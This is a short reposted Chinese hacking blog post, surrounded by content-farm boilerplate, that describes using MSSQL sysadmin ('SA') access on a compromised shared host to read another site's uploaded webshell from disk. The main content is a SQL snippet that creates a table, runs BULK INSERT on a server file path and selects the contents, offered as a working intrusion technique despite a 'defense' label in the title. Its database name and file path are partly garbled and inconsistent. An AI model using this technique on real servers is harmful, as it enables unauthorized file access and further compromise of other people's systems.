MSSQL读取文件号令[MSSQL防范]

赞助商链接

分享到： QQ空间新浪微博腾讯微博人人网

　　本文“MSSQL读取文件号令[MSSQL防范]”是由七道奇为您精心收集，来源于网络转载，文章版权归文章作者所有，本站不对其观点以及内容做任何评价，请读者自行判断，以下是其具体内容：

各种提权

包含

mssql:SA

主机是星外的可以看到目标目录

数据库是ASP的不能插马

无奈找了很多人都木有办法...

本日无聊中查看目录发现有一个高人上传了一个WEBSHELL

在网上找到了办法发现用MSSQL读取文件的办法目前分享一下

Use www.110hack.com;–(这里是随便选的一个数据库)

　　drop table cmd;

　　create table cmd (a text);

　　BULK INSERT cmd

　　FROM 'd:/freehos/webshell.cc.asp'

　　WITH (

　　FIELDTERMINATOR = 'n',

　　ROWTERMINATOR = 'nn'

　　)

　　select * from cmd

　　这样就成功读出了d:/freehos/ www.110hack.com .asp

摘自 webshell.cc 　　以上是“MSSQL读取文件号令[MSSQL防范]”的内容，如果你对以上该文章内容感兴趣，你可以看看七道奇为您推荐以下文章：

本文地址：

与您的QQ/BBS好友分享!

[] [返回上一页] [打印]

评论摘要(共 0 条，得分 0 分，平均 0 分) 查看完整评论